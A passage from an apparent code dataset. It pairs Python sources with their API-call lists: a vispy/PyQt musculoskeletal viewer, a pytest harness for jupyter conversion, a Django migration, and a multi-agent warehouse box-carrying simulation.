markerPosition.append(finalMarkerDict[markerName])
markerPosition=np.stack(markerPosition)
markerMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=markerPosition,face_color='orange')
markerMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
'''
###################################################################
muscles = parse(dataFolder+"muscle284.xml").getElementsByTagName('Unit')
wp=[]
muscleColor=[]
indexPair=[]
random.seed(a=0)
for e in muscles:
name=e.getAttribute('name')
f0=e.getAttribute('f0')
lm=e.getAttribute('lm')
lt=e.getAttribute('lt')
pen_angle=e.getAttribute('pen_angle')
lmax=e.getAttribute('lmax')
#print(name)
#Random a bright color
while True:
cr=random.random()
cg=random.random()
cb=random.random()
if(max([cr,cg,cb])>0.3):
break
for i,w in enumerate(e.getElementsByTagName('Waypoint')):
belongTo=w.getAttribute('body')
p=np.array(floatList(w.getAttribute('p'))) #*
#print(belongTo,p)
pMod=scaleMatDict[belongTo] @ homo(p)
wp.append(pMod[:3])
muscleColor.append([cr,cg,cb,1.0])
if(i>0):
indexPair.append([len(wp)-2,len(wp)-1])
#aLine=scene.visuals.Line(parent=view.scene,pos=wp,width=1,connect='strip',color='yellow') # method='agg'
#aLine.set_gl_state('translucent', cull_face=False,depth_test=True)
wp=np.stack(wp)
muscleColor=np.stack(muscleColor)
allLine=scene.visuals.Line(parent=view.scene,pos=wp,color=muscleColor,width=1,connect=np.array(indexPair))
allLine.set_gl_state('translucent', cull_face=False,depth_test=True)
'''
################# BVH ####################################
bvhMultiplier=0.01
with open(bvhPath+'SNFAT_walking.bvh') as f:
mocap = Bvh(f.read())
rootName='Character1_Hips'
rootOffset=np.array([float(e) for e in next(mocap.root.filter('ROOT'))['OFFSET']])*bvhMultiplier
rootOffset=humanJointPositionList[0,:] #np.zeros(3) #hack
#turn everything I need to dict of dict
s={
'':{
'parent':'',
'relOffset':np.zeros(3), #relative offset from parent joint
'absOffset':np.zeros(3) #absolute offset in rest pose (T-pose)
},
rootName:{
'parent':'',
'relOffset':rootOffset,
'absOffset':rootOffset,
}}
bvhJointList=mocap.get_joints_names()
print(bvhJointList)
for p in bvhJointList:
s[p]['children']=[str(e).split(' ',1)[1] for e in mocap.joint_direct_children(p)]
for c in s[p]['children']:
relativeOffset=np.array(mocap.joint_offset(c))*bvhMultiplier
s[c]={
'parent':p,
'relOffset':relativeOffset,
'absOffset':s[p]['absOffset']+relativeOffset,
}
bvhJointPosition=np.zeros([len(bvhJointList),3])
for i,p in enumerate(bvhJointList):
bvhJointPosition[i,:]=s[p]['absOffset']
#print(p,s[p]['absOffset'])
if('RIGMESH' in p):
bvhJointPosition[i,:]=0
#print(bvhJointPosition)
bvhMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=bvhJointPosition,face_color='blue')
bvhMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
'''
#=================================
rightPanel=QWidget()
gbox = QtWidgets.QGridLayout()
testButton=QPushButton()
testButton.setText("test")
gbox.addWidget(testButton,0,1)
def test():
#sk.set_data(connect=np.array([[0,1],[0,2],[0,3]],dtype=int))
print('click')
testButton.clicked.connect(test)
rightPanel.setLayout(gbox)
splitter=QtWidgets.QSplitter(QtCore.Qt.Horizontal)
splitter.addWidget(canvas.native) #add canvas to splitter
splitter.addWidget(rightPanel)
win.setCentralWidget(splitter) #add splitter to main window
#========================
#========================
win.show()
appQt.exec_()
|
[
"vispy.scene.visuals.Mesh",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QPushButton",
"numpy.ones",
"vispy.scene.visuals.Markers",
"PyQt5.QtWidgets.QApplication",
"numpy.diag",
"vispy.scene.SceneCanvas",
"vispy.scene.visuals.XYZAxis",
"PyQt5.QtWidgets.QWidget",
"random.seed",
"numpy.stack",
"PyQt5.QtWidgets.QMainWindow",
"vispy.scene.visuals.Box",
"random.random",
"vispy.io.read_mesh",
"xml.dom.minidom.parse",
"numpy.array",
"PyQt5.QtWidgets.QSplitter"
] |
[((1039, 1071), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (1061, 1071), False, 'from PyQt5 import QtWidgets, QtCore\n'), ((1079, 1092), 'PyQt5.QtWidgets.QMainWindow', 'QMainWindow', ([], {}), '()\n', (1090, 1092), False, 'from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider\n'), ((1161, 1174), 'vispy.scene.SceneCanvas', 'SceneCanvas', ([], {}), '()\n', (1172, 1174), False, 'from vispy.scene import SceneCanvas\n'), ((1438, 1478), 'vispy.scene.visuals.XYZAxis', 'scene.visuals.XYZAxis', ([], {'parent': 'view.scene'}), '(parent=view.scene)\n', (1459, 1478), False, 'from vispy import scene\n'), ((2042, 2073), 'xml.dom.minidom.parse', 'parse', (["(dataFolder + 'human.xml')"], {}), "(dataFolder + 'human.xml')\n", (2047, 2073), False, 'from xml.dom.minidom import parse\n'), ((4451, 4483), 'numpy.stack', 'np.stack', (['humanJointPositionList'], {}), '(humanJointPositionList)\n', (4459, 4483), True, 'import numpy as np\n'), ((4501, 4601), 'vispy.scene.visuals.Markers', 'scene.visuals.Markers', ([], {'parent': 'view.scene', 'size': '(8)', 'pos': 'humanJointPositionList', 'face_color': '"""green"""'}), "(parent=view.scene, size=8, pos=humanJointPositionList,\n face_color='green')\n", (4522, 4601), False, 'from vispy import scene\n'), ((4689, 4712), 'numpy.stack', 'np.stack', (['boxCenterList'], {}), '(boxCenterList)\n', (4697, 4712), True, 'import numpy as np\n'), ((4729, 4818), 'vispy.scene.visuals.Markers', 'scene.visuals.Markers', ([], {'parent': 'view.scene', 'size': '(8)', 'pos': 'boxCenterList', 'face_color': '"""red"""'}), "(parent=view.scene, size=8, pos=boxCenterList,\n face_color='red')\n", (4750, 4818), False, 'from vispy import scene\n'), ((5625, 5641), 'random.seed', 'random.seed', ([], {'a': '(0)'}), '(a=0)\n', (5636, 5641), False, 'import random\n'), ((6604, 6616), 'numpy.stack', 'np.stack', (['wp'], {}), '(wp)\n', (6612, 6616), True, 'import numpy as np\n'), ((6629, 6650), 'numpy.stack', 'np.stack', (['muscleColor'], {}), '(muscleColor)\n', (6637, 6650), True, 'import numpy as np\n'), ((8371, 8380), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (8378, 8380), False, 'from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider\n'), ((8389, 8412), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', ([], {}), '()\n', (8410, 8412), False, 'from PyQt5 import QtWidgets, QtCore\n'), ((8427, 8440), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (8438, 8440), False, 'from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider\n'), ((8669, 8710), 'PyQt5.QtWidgets.QSplitter', 'QtWidgets.QSplitter', (['QtCore.Qt.Horizontal'], {}), '(QtCore.Qt.Horizontal)\n', (8688, 8710), False, 'from PyQt5 import QtWidgets, QtCore\n'), ((3221, 3248), 'vispy.io.read_mesh', 'io.read_mesh', (['(objPath + obj)'], {}), '(objPath + obj)\n', (3233, 3248), False, 'from vispy import io\n'), ((3492, 3607), 'vispy.scene.visuals.Mesh', 'scene.visuals.Mesh', ([], {'parent': 'view.scene', 'vertices': 'verts', 'shading': '"""flat"""', 'faces': 'faces', 'color': '(0.8, 0.8, 0.8, 0.2)'}), "(parent=view.scene, vertices=verts, shading='flat', faces\n =faces, color=(0.8, 0.8, 0.8, 0.2))\n", (3510, 3607), False, 'from vispy import scene\n'), ((3748, 3863), 'vispy.scene.visuals.Box', 'scene.visuals.Box', ([], {'parent': 'view.scene', 'width': 'size[0]', 'depth': 'size[1]', 'height': 'size[2]', 'color': '(0.8, 0.1, 0.1, 0.2)'}), '(parent=view.scene, width=size[0], depth=size[1], height=\n size[2], color=(0.8, 0.1, 0.1, 0.2))\n', (3765, 3863), False, 'from vispy import scene\n'), ((2486, 2513), 'numpy.diag', 'np.diag', (['scaleMatDict[name]'], {}), '(scaleMatDict[name])\n', (2493, 2513), True, 'import numpy as np\n'), ((5528, 5563), 'xml.dom.minidom.parse', 'parse', (["(dataFolder + 'muscle284.xml')"], {}), "(dataFolder + 'muscle284.xml')\n", (5533, 5563), False, 'from xml.dom.minidom import parse\n'), ((5925, 5940), 'random.random', 'random.random', ([], {}), '()\n', (5938, 5940), False, 'import random\n'), ((5952, 5967), 'random.random', 'random.random', ([], {}), '()\n', (5965, 5967), False, 'import random\n'), ((5979, 5994), 'random.random', 'random.random', ([], {}), '()\n', (5992, 5994), False, 'import random\n'), ((6737, 6756), 'numpy.array', 'np.array', (['indexPair'], {}), '(indexPair)\n', (6745, 6756), True, 'import numpy as np\n'), ((3400, 3428), 'numpy.ones', 'np.ones', (['[1, verts.shape[0]]'], {}), '([1, verts.shape[0]])\n', (3407, 3428), True, 'import numpy as np\n')]
|
import os
from abc import ABC, abstractmethod
from difflib import Differ
from pprint import pprint
from subprocess import call
import pytest
FILE_NAME = "hello-world"
SITE_DIR = "docs"
PAGE_DIR = "_pages"
IMAGE_DIR = os.path.join("assets", "images")
class AbstractConfig(ABC):
@abstractmethod
@pytest.fixture
def args(self):
pass
@pytest.fixture
def app(self, args):
self._app.launch_instance(args)
@pytest.fixture
def command(self, args):
call(["jupyter", self._command] + args)
@pytest.fixture
def package(self, args):
call(["python", "-m", self._command] + args)
@pytest.fixture(autouse=True)
def cleanup(self):
self._app.clear_instance()
class Config(AbstractConfig): # skipcq: PYL-W0223
def test_file(self, output_file): # skipcq: PYL-R0201
assert output_file.check()
def test_image(self, image_dir): # skipcq: PYL-R0201
assert os.path.isdir(image_dir.strpath)
assert os.path.isfile(image_dir.join(FILE_NAME + "_4_0.png").strpath)
def test_header(self, file_contents, target_contents): # skipcq: PYL-R0201
try:
assert all(line in target_contents.header for line in file_contents.header)
except AssertionError:
print_diff(file_contents.header, target_contents.header)
raise
def test_body(self, file_contents, target_contents): # skipcq: PYL-R0201
try:
assert all(a == b for a, b in zip(file_contents.body, target_contents.body))
except AssertionError:
print_diff(file_contents.body, target_contents.body)
raise
def print_diff(test_lines, target_lines):
differ = Differ()
diff = differ.compare(test_lines, target_lines)
pprint(list(diff))
|
[
"difflib.Differ",
"os.path.isdir",
"pytest.fixture",
"subprocess.call",
"os.path.join"
] |
[((219, 251), 'os.path.join', 'os.path.join', (['"""assets"""', '"""images"""'], {}), "('assets', 'images')\n", (231, 251), False, 'import os\n'), ((647, 675), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (661, 675), False, 'import pytest\n'), ((1718, 1726), 'difflib.Differ', 'Differ', ([], {}), '()\n', (1724, 1726), False, 'from difflib import Differ\n'), ((498, 537), 'subprocess.call', 'call', (["(['jupyter', self._command] + args)"], {}), "(['jupyter', self._command] + args)\n", (502, 537), False, 'from subprocess import call\n'), ((596, 640), 'subprocess.call', 'call', (["(['python', '-m', self._command] + args)"], {}), "(['python', '-m', self._command] + args)\n", (600, 640), False, 'from subprocess import call\n'), ((955, 987), 'os.path.isdir', 'os.path.isdir', (['image_dir.strpath'], {}), '(image_dir.strpath)\n', (968, 987), False, 'import os\n')]
|
# Generated by Django 2.2.3 on 2019-07-23 21:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('database', '0016_auto_20190723_2107'),
]
operations = [
migrations.RemoveField(
model_name='useractionrel',
name='testimonial',
),
migrations.AddField(
model_name='userprofile',
name='profile_picture',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='database.Media'),
),
]
|
[
"django.db.migrations.RemoveField",
"django.db.models.ForeignKey"
] |
[((269, 339), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""useractionrel"""', 'name': '"""testimonial"""'}), "(model_name='useractionrel', name='testimonial')\n", (291, 339), False, 'from django.db import migrations, models\n'), ((497, 609), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.SET_NULL', 'to': '"""database.Media"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.SET_NULL, to='database.Media')\n", (514, 609), False, 'from django.db import migrations, models\n')]
|
import numpy as np
import copy
from memory_profiler import profile
# physical/external base state of all entites
def isNear(box,landmark,threshold=0.05):
if (np.sum(np.square(box.state.p_pos-landmark.state.p_pos)) <= threshold):
return True
else:
return False
def calcDistance(entity1,entity2):
return np.sqrt(np.sum(np.square(entity1.state.p_pos - entity2.state.p_pos)))
class EntityState(object):
def __init__(self):
# physical position
self.p_pos = None
# physical velocity
self.p_vel = None
# state of agents (including communication and internal/mental state)
class AgentState(EntityState):
def __init__(self):
super(AgentState, self).__init__()
# communication utterance
self.c = None
# action of the agent
class Action(object):
def __init__(self):
# physical action
self.u = None
# communication action
self.c = None
# pickup Action
self.pickup = False
# drop Action
self.drop = False
class Wall(object):
def __init__(self, orient='H', axis_pos=0.0, endpoints=(-1, 1), width=0.1,
hard=True):
# orientation: 'H'orizontal or 'V'ertical
self.orient = orient
# position along axis which wall lays on (y-axis for H, x-axis for V)
self.axis_pos = axis_pos
# endpoints of wall (x-coords for H, y-coords for V)
self.endpoints = np.array(endpoints)
# width of wall
self.width = width
# whether wall is impassable to all agents
self.hard = hard
# color of wall
self.color = np.array([0.0, 0.0, 0.0])
# properties and state of physical world entity
class Entity(object):
def __init__(self):
# index among all entities (important to set for distance caching)
self.i = 0
# name
self.name = ''
# properties:
self.size = 0.050
# entity can move / be pushed
self.movable = False
# entity collides with others
self.collide = True
# entity can pass through non-hard walls
self.ghost = False
# material density (affects mass)
self.density = 25.0
# color
self.color = None
# max speed and accel
self.max_speed = None
self.accel = None
# state
self.state = EntityState()
# mass
self.initial_mass = 1.0
@property
def mass(self):
return self.initial_mass
# properties of landmark entities
class Landmark(Entity):
def __init__(self):
super(Landmark, self).__init__()
# Properties of the load that we wish to carry
class LoadBox(Entity):
"""
The load boxes have to reach the corresponding landmarks
"""
def __init__(self):
super(LoadBox, self).__init__()
# Agent which will get reward once this task is done
self.agentAssigned = None
# Reward agent will get once the Box Reaches its target
self.rewardAssigned = None
# Determines whether any agent has picked up this box
self.pickedUp = False
# Agent which is handling this box
self.agentHandling = None
#Boxes are pickup but but do not collide
self.collide = False
# Distance of te
self.goalDistInit = None
#To store the previous state of goalDist of the Box
self.prevGoalDist = None
def farInit(self,landmark):
self.goalDistInit = calcDistance(self,landmark)
self.prevGoalDist = copy.deepcopy(self.goalDistInit)
def rewardDist(self,landmark,rewardMultiplier=2.0,negativeRewardMultiplier=-2.0,stagnantReward = -5.0, nearRewardConstant = 10.0):
threshold = 0.05
boxReached = isNear(self,landmark,threshold=threshold)
#! Heavily penalizing taking the box away
distancePrev = copy.deepcopy(self.prevGoalDist)
distanceNow = calcDistance(self,landmark)
#? Updating the goal distance in the memory
self.prevGoalDist = distanceNow
#! Rewarding negative if the box is stagnant
if distanceNow == distancePrev and not boxReached:
return stagnantReward
elif distanceNow == distancePrev and boxReached:
return nearRewardConstant
#! Rewarding negative if the box has been moved away from the target
# elif distanceNow > distancePrev:
# # print("Box Moved Away")
# return negativeRewardMultiplier*((distanceNow-distancePrev)/self.goalDistInit)
#How much is the box nearer to the goal compared to where it was initially
else:
return rewardMultiplier*(1.0-(distanceNow/self.goalDistInit))
# properties of agent entities
class Agent(Entity):
def __init__(self):
super(Agent, self).__init__()
#Names of Assigned Boxes
self.assignedBoxes = []
#Stores all of the boxes that the agent has handled on his way
self.extraBoxesHandled = []
# agents are movable by default
self.movable = True
# cannot send communication signals
self.silent = False
# cannot observe the world
self.blind = False
# is agent from a warehouse task
self.warehouse = False
# physical motor noise amount
self.u_noise = None
# communication noise amount
self.c_noise = None
# control range
self.u_range = 1.0
# state
self.state = AgentState()
# action
self.action = Action()
# script behavior to execute
self.action_callback = None
# multi-agent world
class World(object):
def __init__(self):
# list of agents and entities (can change at execution-time!)
self.agents = []
# list of all of the landmarks initialized
self.landmarks = []
self.walls = []
#To add the boxes that needs to be transported
self.boxes = []
#Reward Associated with the boxes
self.boxRewards = []
#Max number of agents expected
self.maxAgents = 5
#Max number of boxes expected
self.maxBoxes = 5
# communication channel dimensionality
self.dim_c = 0
# position dimensionality
self.dim_p = 2
# color dimensionality
self.dim_color = 3
# simulation timestep
self.dt = 0.1
# physical damping
self.damping = 0.25
# contact response parameters
self.contact_force = 1e+2
self.contact_margin = 1e-3
# cache distances between all agents (not calculated by default)
self.cache_dists = False
self.cached_dist_vect = None
self.cached_dist_mag = None
# return all entities in the world
@property
def entities(self):
return self.agents + self.boxes + self.landmarks
# return all agents controllable by external policies
@property
def policy_agents(self):
return [agent for agent in self.agents if agent.action_callback is None]
# return all agents controlled by world scripts
@property
def scripted_agents(self):
return [agent for agent in self.agents if agent.action_callback is not None]
#! We have not been using this distance which is being calculated every step
def calculate_distances(self):
if self.cached_dist_vect is None:
# initialize distance data structure
self.cached_dist_vect = np.zeros((len(self.entities),
len(self.entities),
self.dim_p))
# calculate minimum distance for a collision between all entities
self.min_dists = np.zeros((len(self.entities), len(self.entities)))
for ia, entity_a in enumerate(self.entities):
for ib in range(ia + 1, len(self.entities)):
entity_b = self.entities[ib]
min_dist = entity_a.size + entity_b.size
self.min_dists[ia, ib] = min_dist
self.min_dists[ib, ia] = min_dist
for ia, entity_a in enumerate(self.entities):
for ib in range(ia + 1, len(self.entities)):
entity_b = self.entities[ib]
delta_pos = entity_a.state.p_pos - entity_b.state.p_pos
self.cached_dist_vect[ia, ib, :] = delta_pos
self.cached_dist_vect[ib, ia, :] = -delta_pos
self.cached_dist_mag = np.linalg.norm(self.cached_dist_vect, axis=2)
self.cached_collisions = (self.cached_dist_mag <= self.min_dists)
def boxRewardCalc(self):
for i, box in enumerate(self.boxes):
self.boxRewards[i] = box.rewardDist(self.landmarks[i])
# update state of the world
def step(self):
# set actions for scripted agents
for agent in self.scripted_agents:
agent.action = agent.action_callback(agent, self)
# update boxes states
self.agent_pick_drop()
# Calculate all of the rewards
self.boxRewardCalc()
# gather forces applied to entities
p_force = [None] * len(self.entities)
# apply agent physical controls
p_force = self.apply_action_force(p_force)
# apply environment forces
p_force = self.apply_environment_force(p_force)
# integrate physical state
self.integrate_state(p_force)
# update agent state
for agent in self.agents:
self.update_agent_state(agent)
# calculate and store distances between all entities
if self.cache_dists:
self.calculate_distances()
def agent_pick_drop(self):
threshold = 0.25
busy_agents = []
# Caculating agents which are busy in carrying boxes
for box in self.boxes:
if box.agentHandling:
busy_agents.append(box.agentHandling)
# Dropping the boxes and removing the respective agents from busy_list
for i, agent in enumerate(self.agents):
# TODO if the agent is stationary only then he can put down the box
if agent.action.drop:
for box in self.boxes:
if box.agentHandling == agent.name: # and (np.linalg.norm(agent.state.p_vel) < 0.5):
agent.color = agent.color + np.ones(agent.color.size)*.5
busy_agents.remove(box.agentHandling)
box.movable = False
box.pickedUp = False
box.agentHandling = None
box.state.p_pos = copy.deepcopy(agent.state.p_pos)
box.state.p_vel = np.zeros(self.dim_p)
break
# TODO better assignment needs to be done (Agent will pick up the box which is most close to him, meanwhile box will be picked up by the agent which is closest)
for box in self.boxes:
closest_agent = []
for agent in self.agents:
# If agent already has one box with him, he can't pickup another one
if agent.name in busy_agents: # or (np.linalg.norm(agent.state.p_vel) > 0.5):
continue
# If agent is in threshold distance he is in competition to pickup the box
# TODO if agent is stationary only then he can pick up the box
if agent.action.pickup and calcDistance(agent,box) <= threshold:
dist = calcDistance(agent,box)
closest_agent.append((dist, agent))
# Select the closest among all agents in threshold distance
if len(closest_agent) > 0:
closest_agent.sort()
#! changing the color of the agent with the box on him
closest_agent[0][1].color = closest_agent[0][1].color - np.ones(agent.color.size)*.5
busy_agents.append(closest_agent[0][1].name)
#? If this box is an extra work that the agent is doing then
if box.name not in closest_agent[0][1].assignedBoxes and box.name not in closest_agent[0][1].extraBoxesHandled:
# print("{} picked extra {}".format(closest_agent[0][1].name,box.name))
closest_agent[0][1].extraBoxesHandled.append(box.name)
box.movable = True
box.pickedUp = True
box.agentHandling = closest_agent[0][1].name
box.state.p_pos = copy.deepcopy(closest_agent[0][1].state.p_pos) ## ISSUE of assignment(temporary fix using deepcopy)
box.state.p_vel = copy.deepcopy(closest_agent[0][1].state.p_vel) ## ISSUE of assignment(temporary fix using deepcopy)
# gather agent action forces
def apply_action_force(self, p_force):
# set applied forces
for i,agent in enumerate(self.agents):
if agent.movable:
noise = np.random.randn(*agent.action.u.shape) * agent.u_noise if agent.u_noise else 0.0
p_force[i] = (agent.mass * agent.accel if agent.accel is not None else agent.mass) * agent.action.u + noise
# apply forces to the pickedup boxes
for i,box in enumerate(self.boxes):
if box.pickedUp:
assert box.agentHandling != None
agent_id = int(box.agentHandling.split(' ')[1])
total_force = p_force[agent_id]
p_force[agent_id] = total_force * (self.agents[agent_id].mass / (box.mass + self.agents[agent_id].mass))
p_force[i + len(self.agents)] = total_force * (box.mass / (box.mass + self.agents[agent_id].mass))
return p_force
# gather physical forces acting on entities
def apply_environment_force(self, p_force):
# simple (but inefficient) collision response
for a,entity_a in enumerate(self.entities):
for b,entity_b in enumerate(self.entities):
if(b <= a): continue
[f_a, f_b] = self.get_collision_force(entity_a, entity_b)
if(f_a is not None):
if(p_force[a] is None): p_force[a] = 0.0
p_force[a] = f_a + p_force[a]
if(f_b is not None):
if(p_force[b] is None): p_force[b] = 0.0
p_force[b] = f_b + p_force[b]
if entity_a.movable:
for wall in self.walls:
wf = self.get_wall_collision_force(entity_a, wall)
if wf is not None:
if p_force[a] is None:
p_force[a] = 0.0
p_force[a] = p_force[a] + wf
return p_force
# integrate physical state
def integrate_state(self, p_force):
# Compute pairs of boxes and agents
pairs = {}
for i,box in enumerate(self.boxes):
if box.agentHandling:
agent_id = int(box.agentHandling.split(' ')[1])
pairs[agent_id] = len(self.agents) + i
pairs[len(self.agents) + i] = agent_id
# Update the state by taking damping anf forces applied in account
for i,entity in enumerate(self.entities):
if not entity.movable: continue
entity.state.p_vel = entity.state.p_vel * (1 - self.damping)
if i in pairs.keys():
if (p_force[i] is not None):
if (p_force[pairs[i]] is not None):
net_force = p_force[i] + p_force[pairs[i]]
else:
net_force = p_force[i]
else:
if (p_force[pairs[i]] is not None):
net_force = p_force[pairs[i]]
else:
net_force = 0
net_mass = entity.mass + self.entities[pairs[i]].mass
entity.state.p_vel += (net_force / net_mass) * self.dt
else:
if (p_force[i] is not None):
entity.state.p_vel += (p_force[i] / entity.mass) * self.dt
# set max allowed speed to minimum of max allowed speed of box and agent
if i in pairs.keys():
if self.entities[pairs[i]].max_speed is not None:
if entity.max_speed is not None:
max_speed = min(self.entities[pairs[i]].max_speed, entity.max_speed)
else:
max_speed = self.entities[pairs[i]].max_speed
else:
max_speed = entity.max_speed
else:
max_speed = entity.max_speed
if max_speed is not None:
speed = np.sqrt(np.square(entity.state.p_vel[0]) + np.square(entity.state.p_vel[1]))
if speed > entity.max_speed:
entity.state.p_vel = entity.state.p_vel / np.sqrt(np.square(entity.state.p_vel[0]) +
np.square(entity.state.p_vel[1])) * entity.max_speed
entity.state.p_pos += entity.state.p_vel * self.dt
def update_agent_state(self, agent):
# set communication state (directly for now)
if agent.silent:
agent.state.c = np.zeros(self.dim_c)#! Message state is directly set hmmmm if silent
else:
noise = np.random.randn(*agent.action.c.shape) * agent.c_noise if agent.c_noise else 0.0
agent.state.c = agent.action.c + noise
# get collision forces for any contact between two entities
def get_collision_force(self, entity_a, entity_b):
if (not entity_a.collide) or (not entity_b.collide):
return [None, None] # not a collider
if (not entity_a.movable) and (not entity_b.movable):
return [None, None] # neither entity moves
if (entity_a is entity_b):
return [None, None] # don't collide against itself
if isinstance(entity_a, Agent) and isinstance(entity_b, LoadBox):
if entity_b.pickedUp and (entity_b.agentHandling == entity_a.name):
return [None, None] # agent don't collide with object if it is carrying it
if self.cache_dists:
delta_pos = self.cached_dist_vect[ia, ib]
dist = self.cached_dist_mag[ia, ib]
dist_min = self.min_dists[ia, ib]
else:
# compute actual distance between entities
delta_pos = entity_a.state.p_pos - entity_b.state.p_pos
dist = np.sqrt(np.sum(np.square(delta_pos)))
# minimum allowable distance
dist_min = entity_a.size + entity_b.size
# softmax penetration
k = self.contact_margin
penetration = np.logaddexp(0, -(dist - dist_min)/k)*k
force = self.contact_force * delta_pos / dist * penetration
if entity_a.movable and entity_b.movable:
# consider mass in collisions
force_ratio = entity_b.mass / entity_a.mass
force_a = force_ratio * force
force_b = -(1 / force_ratio) * force
else:
force_a = +force if entity_a.movable else None
force_b = -force if entity_b.movable else None
return [force_a, force_b]
# get collision forces for contact between an entity and a wall
def get_wall_collision_force(self, entity, wall):
if entity.ghost and not wall.hard:
return None # ghost passes through soft walls
if wall.orient == 'H':
prll_dim = 0
perp_dim = 1
else:
prll_dim = 1
perp_dim = 0
ent_pos = entity.state.p_pos
if (ent_pos[prll_dim] < wall.endpoints[0] - entity.size or
ent_pos[prll_dim] > wall.endpoints[1] + entity.size):
return None # entity is beyond endpoints of wall
elif (ent_pos[prll_dim] < wall.endpoints[0] or
ent_pos[prll_dim] > wall.endpoints[1]):
# part of entity is beyond wall
if ent_pos[prll_dim] < wall.endpoints[0]:
dist_past_end = ent_pos[prll_dim] - wall.endpoints[0]
else:
dist_past_end = ent_pos[prll_dim] - wall.endpoints[1]
theta = np.arcsin(dist_past_end / entity.size)
dist_min = np.cos(theta) * entity.size + 0.5 * wall.width
else: # entire entity lies within bounds of wall
theta = 0
dist_past_end = 0
dist_min = entity.size + 0.5 * wall.width
# only need to calculate distance in relevant dim
delta_pos = ent_pos[perp_dim] - wall.axis_pos
dist = np.abs(delta_pos)
# softmax penetration
k = self.contact_margin
penetration = np.logaddexp(0, -(dist - dist_min)/k)*k
force_mag = self.contact_force * delta_pos / dist * penetration
force = np.zeros(2)
force[perp_dim] = np.cos(theta) * force_mag
force[prll_dim] = np.sin(theta) * np.abs(force_mag)
return force
|
[
"copy.deepcopy",
"numpy.abs",
"numpy.random.randn",
"numpy.square",
"numpy.zeros",
"numpy.arcsin",
"numpy.ones",
"numpy.sin",
"numpy.linalg.norm",
"numpy.array",
"numpy.logaddexp",
"numpy.cos"
] |
[((1463, 1482), 'numpy.array', 'np.array', (['endpoints'], {}), '(endpoints)\n', (1471, 1482), True, 'import numpy as np\n'), ((1655, 1680), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (1663, 1680), True, 'import numpy as np\n'), ((3590, 3622), 'copy.deepcopy', 'copy.deepcopy', (['self.goalDistInit'], {}), '(self.goalDistInit)\n', (3603, 3622), False, 'import copy\n'), ((3948, 3980), 'copy.deepcopy', 'copy.deepcopy', (['self.prevGoalDist'], {}), '(self.prevGoalDist)\n', (3961, 3980), False, 'import copy\n'), ((8676, 8721), 'numpy.linalg.norm', 'np.linalg.norm', (['self.cached_dist_vect'], {'axis': '(2)'}), '(self.cached_dist_vect, axis=2)\n', (8690, 8721), True, 'import numpy as np\n'), ((20909, 20926), 'numpy.abs', 'np.abs', (['delta_pos'], {}), '(delta_pos)\n', (20915, 20926), True, 'import numpy as np\n'), ((21139, 21150), 'numpy.zeros', 'np.zeros', (['(2)'], {}), '(2)\n', (21147, 21150), True, 'import numpy as np\n'), ((171, 220), 'numpy.square', 'np.square', (['(box.state.p_pos - landmark.state.p_pos)'], {}), '(box.state.p_pos - landmark.state.p_pos)\n', (180, 220), True, 'import numpy as np\n'), ((348, 400), 'numpy.square', 'np.square', (['(entity1.state.p_pos - entity2.state.p_pos)'], {}), '(entity1.state.p_pos - entity2.state.p_pos)\n', (357, 400), True, 'import numpy as np\n'), ((17528, 17548), 'numpy.zeros', 'np.zeros', (['self.dim_c'], {}), '(self.dim_c)\n', (17536, 17548), True, 'import numpy as np\n'), ((19008, 19047), 'numpy.logaddexp', 'np.logaddexp', (['(0)', '(-(dist - dist_min) / k)'], {}), '(0, -(dist - dist_min) / k)\n', (19020, 19047), True, 'import numpy as np\n'), ((21011, 21050), 'numpy.logaddexp', 'np.logaddexp', (['(0)', '(-(dist - dist_min) / k)'], {}), '(0, -(dist - dist_min) / k)\n', (21023, 21050), True, 'import numpy as np\n'), ((21177, 21190), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (21183, 21190), True, 'import numpy as np\n'), ((21229, 21242), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (21235, 21242), True, 'import numpy as np\n'), ((21245, 21262), 'numpy.abs', 'np.abs', (['force_mag'], {}), '(force_mag)\n', (21251, 21262), True, 'import numpy as np\n'), ((12733, 12779), 'copy.deepcopy', 'copy.deepcopy', (['closest_agent[0][1].state.p_pos'], {}), '(closest_agent[0][1].state.p_pos)\n', (12746, 12779), False, 'import copy\n'), ((12868, 12914), 'copy.deepcopy', 'copy.deepcopy', (['closest_agent[0][1].state.p_vel'], {}), '(closest_agent[0][1].state.p_vel)\n', (12881, 12914), False, 'import copy\n'), ((20508, 20546), 'numpy.arcsin', 'np.arcsin', (['(dist_past_end / entity.size)'], {}), '(dist_past_end / entity.size)\n', (20517, 20546), True, 'import numpy as np\n'), ((17631, 17669), 'numpy.random.randn', 'np.random.randn', (['*agent.action.c.shape'], {}), '(*agent.action.c.shape)\n', (17646, 17669), True, 'import numpy as np\n'), ((18807, 18827), 'numpy.square', 'np.square', (['delta_pos'], {}), '(delta_pos)\n', (18816, 18827), True, 'import numpy as np\n'), ((10851, 10883), 'copy.deepcopy', 'copy.deepcopy', (['agent.state.p_pos'], {}), '(agent.state.p_pos)\n', (10864, 10883), False, 